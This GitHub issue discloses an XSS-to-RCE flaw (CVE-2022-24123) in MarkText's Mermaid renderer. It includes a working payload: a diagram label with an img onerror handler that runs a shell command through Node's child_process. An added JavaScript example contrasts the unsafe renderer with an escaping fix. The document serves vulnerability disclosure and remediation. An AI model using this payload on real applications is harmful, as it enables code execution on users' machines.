
XSS to RCE vulnerability in Mermaid renderer #2946

Closed
1 task done
wuhan005 opened this issue Jan 28, 2022 · 1 comment · Fixed by #2947
Labels
🪲 pri/major Bugs will affect your normal use of Mark Text, causing you unwilling or unable to continue using MT 🐛 bug Something isn't working

Comments

@wuhan005

Description

According to #2504, it will add a closing element at the end, which means it tries to parse it as HTML.

  • [x] Can you reproduce the issue?

Steps to reproduce

Insert the following code into a markdown page:

(Remove the \ in the last line.)

```mermaid
sequenceDiagram
 B ->> S: <img src=1 onerror="require('child_process').exec('open /System/Applications/Calculator.app')">
 hello -> B: 
\```

Expected behavior:

Language input for the fenced code block should be sanitized before being rendered.

Actual behavior:

[screenshot omitted]

Versions

  • MarkText version: v0.16.3
  • Operating system: macOS 12.1
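As an added example (not code from the original issue, MarkText or Mermaid), the sink the report describes and the fix it asks for, in JavaScript: a hypothetical stand-in for a sequence-diagram renderer that splices each message label into SVG markup as raw HTML, beside a variant that HTML-escapes the label at the point it meets the markup. The markdown input is constructed here and embeds the payload from the report. One caveat worth seeing in code: escaping the whole fenced block before parsing would also encode the `>` in `->>` and break the arrow syntax, so the encoding has to sit where text is emitted into markup, after parsing:

```javascript
// Added example, not code from MarkText or Mermaid. A toy renderer that
// splices diagram label text into markup as raw HTML (the sink the report
// describes), beside a hardened variant that HTML-escapes each label where
// it is emitted. The markdown below is constructed for this example and
// embeds the payload from the issue report.
const MARKDOWN = [
  '# notes',
  '',
  '```mermaid',
  'sequenceDiagram',
  ' B ->> S: <img src=1 onerror="require(\'child_process\').exec(\'open /System/Applications/Calculator.app\')">',
  ' hello -> B: ',
  '```',
  '',
].join('\n');

// Extract fenced code blocks together with their info string (the language tag).
function extractFencedBlocks(markdown) {
  const blocks = [];
  const fence = /^```([^\n`]*)\n([\s\S]*?)^```[ \t]*$/gm;
  let m;
  while ((m = fence.exec(markdown)) !== null) {
    blocks.push({ lang: m[1].trim(), body: m[2] });
  }
  return blocks;
}

// Escape the five characters that can open a tag, an attribute or an entity.
// Encoding (rather than a blocklist of tag names) leaves nothing for the
// HTML parser to interpret as markup, whatever the payload looks like.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical sequence-diagram parser: returns the label that follows
// "A ->> B:" (or "A -> B:") on each line. Lines without an arrow are ignored.
function parseSequenceLabels(body) {
  return body.split('\n')
    .map((line) => line.match(/^\s*\S+\s*-+>>?\s*\S+:\s*(.*)$/))
    .filter(Boolean)
    .map((m) => m[1]);
}

// Vulnerable pattern: the label is dropped verbatim into an SVG <text>
// element, so an <img> with an onerror handler in the label becomes a live
// element once this string reaches the DOM.
function renderSequenceLabelsUnsafe(body) {
  return parseSequenceLabels(body).map((t) => `<text>${t}</text>`).join('');
}

// Hardened variant: parse first, then escape the label text where it meets
// markup. The arrow syntax is untouched because it never reaches the output.
function renderSequenceLabelsSafe(body) {
  return parseSequenceLabels(body).map((t) => `<text>${escapeHtml(t)}</text>`).join('');
}

// Render every mermaid fence in a document with the given label renderer;
// any other fence is emitted as an escaped <pre> block.
function renderDiagrams(markdown, renderLabels) {
  return extractFencedBlocks(markdown).map((b) =>
    b.lang === 'mermaid' ? `<svg>${renderLabels(b.body)}</svg>` : `<pre>${escapeHtml(b.body)}</pre>`);
}

// Check: does the produced markup contain a tag carrying an inline event handler?
function containsEventHandler(markup) {
  return /<[^>]+\son[a-z]+\s*=/i.test(markup);
}

// Stand-alone demonstration on the constructed document.
console.log('unsafe:', renderDiagrams(MARKDOWN, renderSequenceLabelsUnsafe)[0]);
console.log('safe  :', renderDiagrams(MARKDOWN, renderSequenceLabelsSafe)[0]);
```

The `require('child_process')` in the payload only resolves because the renderer window exposes Node to page scripts; in Electron that is governed by the `nodeIntegration` and `contextIsolation` BrowserWindow options, and keeping Node out of the renderer turns the same XSS back into a bug that cannot reach the operating system. Output encoding at the boundary, as above, removes the XSS itself; where the rendered output must keep some markup, a sanitizing HTML parser such as DOMPurify is the usual choice rather than a hand-written blocklist.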
@Jocs added the 🪲 pri/major and 🐛 bug labels on Jan 29, 2022
@wuhan005 (Author)

CVE-2022-24123 assigned.
